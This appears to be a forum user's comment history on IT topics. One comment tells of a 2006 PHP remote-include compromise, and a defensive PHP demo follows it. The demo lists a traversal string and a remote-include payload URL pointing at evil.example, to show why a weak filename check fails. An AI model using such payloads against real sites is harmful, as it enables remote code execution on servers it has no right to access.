450 posts • joined 26 Jan 2011
"any interruption of service would not materially impact internet traffic".
I could use this in my customer service notices. This is absolutely awesome:
"This total interruption of service does not materially impact the use of your product, and does not affect our 99.999ggg9% uptime SLA guarantee.
As such, please don't ask our sales team for service credit, as your services are not materially impacted even if they are. You Have Been Told.
Your Beloved and All-Knowing Support Team".
A theory, with first a backstory about botnets.
In 2006 I designed and delivered, as a one-man-band freelance engineer, an online selling site for a toy company, all built from scratch. I did my best at mitigating attacks, injections, account security, hashing and seeding password details; I even wrote some bug fixes for a major bank's online credit card processing library.
I got a request for a last-minute change to add shop details so that someone could find their closest shop, with photo and contact details. A quick change: the shop name was passed in the URL, this argument was parsed, checked that it was not attempting to get out of its root directory (in the end, not well enough), then used to run an include of $shopname.inc, which would be rendered to the shop details page. This ran without fault for months.
So, one day the site started running slow. SSH'd into the box; ps aux showed two Perl scripts running from /tmp, taking up 98% CPU. Killed the processes, archived the files, rebooted as single user and archived the logs, ran several malware checks, and ended up reimaging the server and restoring the site from cold backup to be sure.
After two days of log analysis looking at how the box was pwned, I ended up finding in the Apache logs thousands of scans attempting to exploit known issues in known web apps and web servers. All ended with a server error, as I was not running those apps or servers (server says Apache, runs on Linux, let's run IIS attacks to get to the server's C: drive...) except one, from memory something like scan 2400 out of 6000: a direct access to one specific page on my site, no poking around to see what worked, no plugging in random values to see how the server responded, just one single bang at one direct page, all needed values present plus one 'unexpected' one informing PHP to include the remote payload.
So. Rookie mistake, not realising that include() was not just a local include.
What got me was that somebody had checked the site, understood how the system went together, and crafted a tailored, specific attack for a specific page on this low-volume, totally bespoke, closed-source website, not used anywhere else on the net.
I never did find any details in the available logs on how somebody poked around and identified the pages to include, so it happened over a month before, then was released, and that scan was being used in a script kiddie's automated attack package; my bug was being searched for on millions of servers around the net.
So, somebody took the time to look up the server, find a vulnerability (even if it was simple, you needed to check and test first), design the attack and package it in with a list of others, then run the attacks, running from what I could discover DDoS and sending spam.
I was amazed that someone took the time to find a one-off vuln in a one-off app on one server so they could pwn it, and was running the same attack on other servers around the world.
Fast forward eight years: ticket bots are on the rise when I first hear about the problem.
My theory is that some guy who was dedicated enough to do major analysis work to grab a fistful of dollars sending Viagra spam on a couple of thousand pwned servers has levelled up and is putting their resources into reverse engineering ticket sites, custom matrices to be able to get in, get around CAPTCHAs and work on seat allocation.
Sell one inflated ticket and you have made 10 times more than you would ever have done pumping a few million spam emails from your botnet. Sell a thousand tickets and you are laughing. And far more legal than overt hacking. Less pain, more gain.
So, how to mitigate? IP range restrictions from the major bitbarns à la BBC iPlayer? It would probably slow the automated scrapes. Better CAPTCHAs would be good too, but would still be vulnerable to wetware hacking from a Bangladeshi sweatshop paid a few cents per form filled. Add some geo restrictions and order limitations per IP, and it should go some way to limiting the fake purchases. Ticket naming and proof of ID, with reimbursement but no exchange/resale, would be the cherry on top.
But are the ticket selling sites interested in doing this or are they just doing a ‘don’t care got paid’ customer service model...?
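The include() bug described in the post above, as an added illustration (my own code, not the commenter's site): the traversal-only check that lets a URL through, beside an allow-listed, directory-confined version. The shop name `oxford-street`, the scratch directory under the system temp dir and the payload URL `http://evil.example/shell.txt?` are constructed for the demo; both functions return the string that would have been handed to include() rather than including anything.

```php
<?php
declare(strict_types=1);

// Added illustration of the bug described in the post; not the original site's code.
// Shop names, the scratch directory and the payload URL are made up for the demo.

// Stand-in for the shop details directory, created under the temp dir so the script
// runs anywhere. One legitimate shop file is written into it.
$shopDir = sys_get_temp_dir() . '/shops-demo';
if (!is_dir($shopDir)) {
    mkdir($shopDir, 0700, true);
}
file_put_contents($shopDir . '/oxford-street.inc', "<h2>Oxford Street</h2>\n");

// Vulnerable shape: only ".." is rejected, so any string without ".." survives,
// including a URL. include("http://evil.example/shell.txt?.inc") fetches and
// executes the remote file when URL includes are enabled (allow_url_fopen before
// PHP 5.2, allow_url_include from 5.2 on); the appended ".inc" just lands in the
// query string, so the attacker's server still serves shell.txt.
function vulnerable_include_target(string $shop): ?string
{
    if (strpos($shop, '..') !== false) {
        return null;                          // the original traversal check
    }
    return $shop . '.inc';                    // a URL passes straight through
}

// Hardened shape: a strict allow-list on the name, then confinement of the
// resolved path to $shopDir, so neither a URL nor a symlink can escape.
function safe_include_target(string $shopDir, string $shop): ?string
{
    if (!preg_match('/\A[a-z0-9-]{1,40}\z/', $shop)) {
        return null;                          // no slashes, colons, dots or NULs
    }
    $base = realpath($shopDir);
    $path = realpath($shopDir . '/' . $shop . '.inc');
    if ($base === false || $path === false) {
        return null;                          // unknown shop: send a 404, not include()
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                          // resolved outside the shop directory
    }
    return $path;
}

// Constructed inputs: a real shop, a classic traversal, and the remote-include payload.
$inputs = [
    'oxford-street',
    '../../etc/passwd',
    'http://evil.example/shell.txt?',
];
foreach ($inputs as $in) {
    printf("%-32s vulnerable=%s  safe=%s\n",
        $in,
        var_export(vulnerable_include_target($in), true),
        var_export(safe_include_target($shopDir, $in), true));
}
```

Run it with `php demo.php`: the vulnerable function hands include() the URL unchanged (with `.inc` tacked on as a harmless query string), while the hardened one returns NULL for anything not on the allow-list and not already sitting inside the shop directory. That is the actual fix: user input must pick from a fixed set of pages, never compose the include path. Turning `allow_url_include` off is belt and braces, not the fix, because the same include() will happily load a local file the attacker managed to write (an uploaded image, a poisoned log) once the name check is weak.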
Because all the cool kids did it back in the day probably. Thanks Lotus.
I will admit that from a VB point of view, the access you can still get into Office apps is awesome if you need it, but VBA automation is such a niche market that it can only be a fraction of a percent of the user base.
The fraction of a percent of skint teenagers learning to program VB in the nineties will thank MS for embedding the VB6 IDE into Office tools that only cost a quarter of the official product :)
I cannot find the initial technical article, probably long gone and/or buried in one of Microsoft's blogs, but I did dig up these three, talking about the Windows 95 era:
- Windows 95 detected if SimCity was running, and then ran the memory allocator in SimCity compatibility mode to ensure that the app did not crash the protected memory model due to a memory allocation bug in the game: https://www.joelonsoftware.com/2000/05/24/strategy-letter-ii-chicken-and-egg-problems/
- Why Windows 95 never displayed a compatibility error to request an upgrade for this: https://blogs.msdn.microsoft.com/oldnewthing/20050728-16/?p=34783
- Windows 95 shipped without a laptop battery power limitation trick because specific laptops from a specific big name manufacturer at the time would lock up if you used it (and also another system would crash if your graphics card was too far away from the power supply on the local bus): https://blogs.msdn.microsoft.com/oldnewthing/20030828-00/?p=42753
For these cases, the issue was that there was software and hardware with known faults that would bring down the system, and in general the customer experience would be "this bloody operating system is so crap, it can't even run apps that it used to run before the upgrade". Given that when '95 came out the internet was in its infancy, telling a client to "navigate" to a "website" and "download" a "patch" would be incomprehensible for the vast majority of users at that time, who went out to real physical shops and bought software on diskettes and CDs. Remember, this was the time when Windows 95 was sold on a ton of diskettes (between 13 and 40 depending on your release version). So finding that there may have been a Windows bug, or a discovered undocumented feature, that allowed some software to do something that worked could well have been broken after a bugfix or a change in the internal APIs, bringing down the app that used or exploited it. Again, this would be taken as Microsoft's fault because their working game broke, when actually it could be the game playing fast and loose with the specs. Now Microsoft wants that module (which could be a common module used across several game engines) to be fixed to avoid the hassle of SimCity hacks in the kernel, especially now that everyone has internet and these patches can be distributed as and when needed, avoiding Windows having to develop nasty compatibility workarounds.
Well, this is also the great thing with English having mostly neutral nouns, and when there are male or female ones it is implicit (a ship is a "she" by convention in English, but "he" in French and Russian, for example), so the translation needs to do some guesswork to get from a neutral noun to the one you want.
So, "I talked to the nurse today" becomes "j'ai parlé à l'infirmière aujourd'hui", but if you specify "I talked to the male nurse today", it does change to the male sentence "j'ai parlé à l'infirmier aujourd'hui", so you can overrule it if you need to by being explicit.
Starting with the page code, which can be helped with HTTP compression options, but then you get the images, which may not be much (though I've seen too many 4 MB JPEGs being forced down into a 200 x 300 pixel window), then you add a couple of hundred KB of minified jQuery, then a gazillion JS includes for all the tracking and stats libraries under the sun, plus the Google Tag library, as someone has realised that their website is so locked down that the only way they can publish content to their own website is using an external system, chewing through your data package... only finally, after two seconds running about 10 redirects, to tell you that you are the billionth visitor to this website and you have won a free copy of Viking Nazi Zombies Rape and Pillage if you click here and subscribe to a 50 quid a week game plan, and you cannot get back to the actual bloody content you wanted to read in the first place...
Yep, the web has come a long way since when I started in 1994. Get off my lawn and take your fucking fake arsed download buttons and autoplay video ads with you.
Mine's the one with my mate's diskette of racy animated GIFs in the pocket... I swear it's my mate's. I'd never look at such stuff, of course.
Would whispering directly into Alexa something along the lines of ordering sex toys or a 55-gallon drum of anal lube, while the host was out fixing drinks, not give them the message that an always-on listening device linked into the online tat bazaar is not a good idea? You can always protest that the thing must have been mis-listening to your conversation...
After being an IE fanboy for years due to Firefox becoming a memory-hogging monster, Chrome was a big surprise and I jumped on it in a big way, but with the increasing data slurp, memory issues, and lack of flexibility in declaring internal sites as trusted and safe, I ended up a couple of months ago trying out Firefox again, and was pleasantly surprised. I did have a moment of doubt when I got a notification that Firebug was going to have issues, but the built-in tools were good. I am now only using FF and happy with it.
Your father's source code was committed to your mother's repo and merged with hers, then was managed and developed further by her until you arrived as a 1.0 release about nine months later (or possibly a public beta if the product was delivered early but unfinished, asking the community for assistance to complete the product, which raises some ethical questions about your public licence...).
So, aside from the initial commit and merge, all the development into a viable product was done by yo moma, so I would say she is responsible for the original work, holds the copyright and enforces her legal ownership until copyright expiration after the legal 18 to 21 year expiration date!
Difficult really, as Dabbsy is here once a week, and Simon about twice a year...
Then again, I did notice that Alistair seems to have been getting his inspiration from somewhere in his recent articles. We will know when we see the article about the client getting pushed down the stairs, stuck in a lift over a long weekend or getting home-made ECT in the unlit underground car park...
Biting the hand that feeds IT © 1998–2019